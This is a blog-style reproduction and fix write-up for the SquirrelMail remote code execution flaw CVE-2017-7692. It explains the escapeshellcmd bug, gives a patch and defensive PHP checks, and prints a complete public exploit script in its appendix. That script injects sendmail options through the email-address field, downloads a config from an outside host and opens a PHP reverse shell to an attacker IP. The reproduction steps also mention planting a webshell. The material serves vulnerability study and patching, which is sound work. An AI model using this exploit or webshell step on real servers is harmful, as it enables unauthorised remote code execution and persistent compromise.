
SquirrelMail remote code execution vulnerability (CVE-2017-7692): reproduction and fix

Published: 17-05-17


1. Lab environment

Attacker machine: Kali 2.0

Target machine: CentOS 6.0

SquirrelMail version: 1.4.22-4el6

2. How the vulnerability works

1. The attacker has a mailbox account and password that can log in.

2. SquirrelMail's MTA (mail transfer agent) is configured to use Sendmail as the delivery method.

3. SquirrelMail's edit_identity option is set to true (the default configuration).

The vulnerability is triggered in the file Deliver_SendMail.class.php in the SquirrelMail source. In the initStream function, escapeshellcmd() is used to sanitise the user-supplied data, and the resulting string is then passed to popen() (which opens a pipe to a process):

$this->sendmail_command = "$sendmail_path $this->sendmail_args -f$envelopefrom";

$stream = popen(escapeshellcmd($this->sendmail_command), "w");

However, escapeshellcmd() only escapes the following characters (by prefixing each of them with a backslash):

&#;`|*?~<>^()[]{}$\, \x0A and \xFF

Spaces and the hyphen are not on that list, so an envelope-from address that contains extra whitespace-separated tokens passes through unchanged, and sendmail parses those tokens as additional command-line options.

3. Reproduction steps

1. Unpack the files and run poc.sh to verify that the vulnerability is present.

2. Following the script's prompts, enter the username and password, choose the payload type, and set the IP address and listening port.

3. After waiting about 10 seconds, you can see that the target service has connected back with a command shell.

4. Next, we go into the SquirrelMail source directory and leave a one-line webshell there.

4. Fixing the vulnerability

Location of the vulnerable file and function:

/usr/share/squirrelmail/class/deliver/

the initStream function

Replace that code with the following, so that the user-controlled envelope-from address is quoted as a single argument by escapeshellarg() instead of being passed through escapeshellcmd() together with the rest of the command line:

$this->sendmail_command = escapeshellcmd("$sendmail_path $this->sendmail_args -f").escapeshellarg($envelopefrom);
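The following is an added example, not SquirrelMail's own code, that puts the vulnerable construction from initStream() side by side with the patched one from the fix above and adds a defence-in-depth check on the envelope-from address. The sendmail_path and sendmail_args values, the helper name isPlausibleEnvelopeFrom() and the tampered address are all illustrative assumptions.

```php
<?php
// Added example (not SquirrelMail's code): vulnerable vs. fixed command
// construction for the sendmail delivery path, plus an input sanity check.
// $sendmailPath / $sendmailArgs below are illustrative assumptions.

function buildVulnerable(string $sendmailPath, string $sendmailArgs, string $envelopeFrom): string
{
    // Original construction: escapeshellcmd() over the whole command line.
    // It escapes shell metacharacters but leaves spaces and '-' untouched,
    // so extra words inside $envelopeFrom survive as extra sendmail options.
    return escapeshellcmd("$sendmailPath $sendmailArgs -f$envelopeFrom");
}

function buildFixed(string $sendmailPath, string $sendmailArgs, string $envelopeFrom): string
{
    // Patched construction: the trusted part still goes through
    // escapeshellcmd(), while the user-controlled address is wrapped by
    // escapeshellarg(), which single-quotes it as exactly one argument.
    return escapeshellcmd("$sendmailPath $sendmailArgs -f") . escapeshellarg($envelopeFrom);
}

function isPlausibleEnvelopeFrom(string $address): bool
{
    // Hypothetical defence-in-depth helper: an envelope-from must be a single
    // mailbox token, so reject whitespace, a leading '-' and non-addresses.
    if ($address === '' || $address[0] === '-' || preg_match('/\s/', $address)) {
        return false;
    }
    return filter_var($address, FILTER_VALIDATE_EMAIL) !== false;
}

$path = '/usr/sbin/sendmail';   // assumed sendmail_path
$args = '-i -t';                // assumed sendmail_args
$benign   = 'alice@example.org';
$tampered = 'alice@localhost -X/tmp/example';  // constructed: address with an appended option

foreach ([$benign, $tampered] as $from) {
    echo "envelope-from: $from\n";
    echo "  vulnerable: " . buildVulnerable($path, $args, $from) . "\n";
    echo "  fixed:      " . buildFixed($path, $args, $from) . "\n";
    echo "  accepted:   " . (isPlausibleEnvelopeFrom($from) ? 'yes' : 'no') . "\n";
}
```

Running this under the PHP CLI shows that for the tampered address the vulnerable string still contains a separate -X token, whereas the fixed string carries the whole address inside single quotes, so sendmail receives it as one -f argument. The extra check is independent of the fix and simply refuses anything that is not a single valid address.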

Appendix: PoC

#!/bin/bash

#

int='\033[94m

__ __ __ __ __

/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________

/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/

/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,

# Quick and messy PoC for SquirrelMail webmail application.

# It contains payloads for 2 vectors:

# * File Write

# * RCE

# It requires user credentials and that SquirrelMail uses

# Sendmail method as email delivery transport

#

#

# Full advisory URL:

# https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html

# Exploit URL:

# https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh

#

# Tested on: # Ubuntu 16.04

# squirrelmail package version:

# 2:1.4.23~svn20120406-2ubuntu1.16.04.1

#

# Disclaimer:

# For testing purposes only

#

#

# -----------------------------------------------------------------

#

# Interested in vulns/exploitation?

# Stay tuned for my new project - ExploitBox

#

# .;lc'

# .,cdkkOOOko;.

# .,lxxkkkkOOOO000Ol'

# .':oxxxxxkkkkOOOO0000KK0x:'

# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;.

# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl.

# '';ldxxxxxdc,. ,oOXXXNNNXd;,.

# .ddc;,,:c;. ,c: .cxxc:;:ox:

# .dxxxxo, ., ,kMMM0:. ., .lxxxxx:

# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx:

# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx:

# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx:

# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx:

# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx:

# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx:

# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx:

# .dxxxxxdl;. ., .. .;cdxxxxxx:

# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx:

# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,.

# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:.

# .':oxxxxxxxxx.ckkkkkkkkxl,.

# .,cdxxxxx.ckkkkkxc.

# .':odx.ckxl,.

# .,.'.

#

# https://ExploitBox.io

#

# https://twitter.com/Exploit_Box

#

# -----------------------------------------------------------------

sqspool="/var/spool/squirrelmail/attach/"

echo -e "$int"

#echo -e "\033[94m \nSquirrelMail - Remote Code Execution PoC Exploit (CVE-2017-7692) \n"

#echo -e "SquirrelMail_RCE_exploit.sh (ver. 1.0)\n"

#echo -e "Discovered and coded by: \n\nDawid Golunski \nhttps://legalhackers.com \033[0m\n\n"

# Base URL

if [ $# -ne 1 ]; then

echo -e "Usage: \n$0 SquirrelMail_URL"

echo -e "Example: \n$0 http://target/squirrelmail/ \n"

exit 2

fi

URL="$1"

# Log in

echo -e "\n[*] Enter SquirrelMail user credentials"

read -p "user: " squser

read -sp "pass: " sqpass

echo -e "\n\n[*] Logging in to SquirrelMail at $URL"

curl -s -D /tmp/sqdata -d"login_username=$squser&secretkey=$sqpass&js_autodetect_results=1&just_logged_in=1" $URL/src/redirect.php | grep -q incorrect

if [ $? -eq 0 ]; then

echo "Invalid creds"

exit 2

fi

sessid="`cat /tmp/sqdata | grep SQMSESS | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"

keyid="`cat /tmp/sqdata | grep key | tail -n1 | cut -d'=' -f2 | cut -d';' -f1`"

# Prepare Sendmail cnf

#

# * The config will launch php via the following stanza:

#

# Mlocal, P=/usr/bin/php, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,

# T=DNS/RFC822/X-Unix,

# A=php -- $u $h ${client_addr}

#

wget -q -O/tmp/smcnf-exp https://legalhackers.com/exploits/sendmail-exploit.cf

# Upload config

echo -e "\n\n[*] Uploading Sendmail config"

token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/compose.php?mailbox=INBOX&startMessage=1" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"

attachid="`curl -H "Expect:" -s -b"SQMSESSID=$sessid; key=$keyid" -F"smtoken=$token" -F"send_to=$mail" -F"subject=attach" -F"body=test" -F"attachfile=@/tmp/smcnf-exp" -F"username=$squser" -F"attach=Add" $URL/src/compose.php | awk -F's:32' '{print $2}' | awk -F'"' '{print $2}' | tr -d '\n'`"

if [ ${#attachid} -lt 32 ]; then

echo "Something went wrong. Failed to upload the sendmail file."

exit 2

fi

# Create Sendmail cmd string according to selected payload

echo -e "\n\n[?] Select payload\n"

# SELECT PAYLOAD

echo "1 - File write (into /tmp/sqpoc)"

echo "2 - Remote Code Execution (with the uploaded smcnf-exp + phpsh)"

echo

read -p "[1-2] " pchoice

case $pchoice in

1) payload="$squser@localhost -oQ/tmp/ -X/tmp/sqpoc"

;;

2) payload="$squser@localhost -oQ/tmp/ -C$sqspool/$attachid"

;;

esac

if [ $pchoice -eq 2 ]; then

echo

read -p "Reverse shell IP: " reverse_ip

read -p "Reverse shell PORT: " reverse_port

fi

# Reverse shell code

phprevsh="

/dev/tcp/$reverse_ip/$reverse_port 0&1 & '\";

file_put_contents(\"/tmp/cmd\", 'export PATH=\"\$PATH\" ; export TERM=vt100 ;' . \$cmd);

system(\"/bin/bash /tmp/cmd ; rm -f /tmp/cmd\");

?>"

# Set sendmail params in user settings

echo -e "\n[*] Injecting Sendmail command parameters"

token="`curl -s -b"SQMSESSID=$sessid; key=$keyid" "$URL/src/options.php?optpage=personal" | grep smtoken | awk -F'value="' '{print $2}' | cut -d'"' -f1 `"

curl -s -b"SQMSESSID=$sessid; key=$keyid" -d "smtoken=$token&optpage=personal&optmode=submit&submit_personal=Submit" --data-urlencode "new_email_address=$payload" "$URL/src/options.php?optpage=personal" | grep -q 'Success' 2>/dev/null

if [ $? -ne 0 ]; then

echo "Failed to inject sendmail parameters"

exit 2

fi

# Send email which triggers the RCE vuln and runs phprevsh

echo -e "\n[*] Sending the email to trigger the vuln"

(sleep 2s && curl -s -D/tmp/sheaders -b"SQMSESSID=$sessid; key=$keyid" -d"smtoken=$token" -d"startMessage=1" -d"session=0" \

-d"send_to=$squser@localhost" -d"subject=poc" --data-urlencode "body=$phprevsh" -d"send=Send" -d"username=$squser" $URL/src/compose.php) &

if [ $pchoice -eq 2 ]; then

echo -e "\n[*] Waiting for shell on $reverse_ip port $reverse_port"

nc -vv -l -p $reverse_port

else

echo -e "\n[*] The test file should have been written at /tmp/sqpoc"

fi

grep -q "302 Found" /tmp/sheaders

if [ $? -eq 1 ]; then

echo "There was a problem with sending email"

exit 2

fi

# Done

echo -e "\n[*] All done. Exiting"
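The PoC above persists its sendmail options by writing them into the user's email address through options.php (new_email_address). The following is an added audit example, not part of the original article or of SquirrelMail, that scans per-user preference data for such an address. It assumes the preference store consists of key=value lines with an email_address key, as in SquirrelMail's data/<user>.pref files; the sample contents and the attachment name are constructed.

```php
<?php
// Added example (not SquirrelMail's code): flag email_address preference
// values that carry sendmail command-line options.
// Assumption: preference data is key=value lines with an email_address key.

function findInjectedAddresses(string $prefContents): array
{
    $findings = [];
    foreach (preg_split('/\r?\n/', $prefContents) as $index => $line) {
        if (strpos($line, '=') === false) {
            continue;
        }
        [$key, $value] = explode('=', $line, 2);
        if (trim($key) !== 'email_address') {
            continue;
        }
        $value = trim($value);
        // A legitimate value is a single mailbox token. Whitespace followed by
        // '-' is the signature of an appended option such as -oQ, -C or -X.
        if (preg_match('/\s-/', $value) || filter_var($value, FILTER_VALIDATE_EMAIL) === false) {
            $findings[] = ['line' => $index + 1, 'value' => $value];
        }
    }
    return $findings;
}

// Constructed sample preference data: one clean user and one tampered user.
$samples = [
    'alice.pref' => "full_name=Alice\nemail_address=alice@example.org\n",
    'bob.pref'   => "full_name=Bob\nemail_address=bob@localhost -oQ/tmp/ -C/var/spool/squirrelmail/attach/EXAMPLE_ATTACH_ID\n",
];

foreach ($samples as $file => $contents) {
    foreach (findInjectedAddresses($contents) as $hit) {
        printf("%s:%d suspicious email_address: %s\n", $file, $hit['line'], $hit['value']);
    }
}
```

In a real deployment the $samples array would be replaced by reading each file under the SquirrelMail data directory; any hit is worth correlating with the attachment spool directory named in the -C option, since the PoC uploads its sendmail configuration there.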
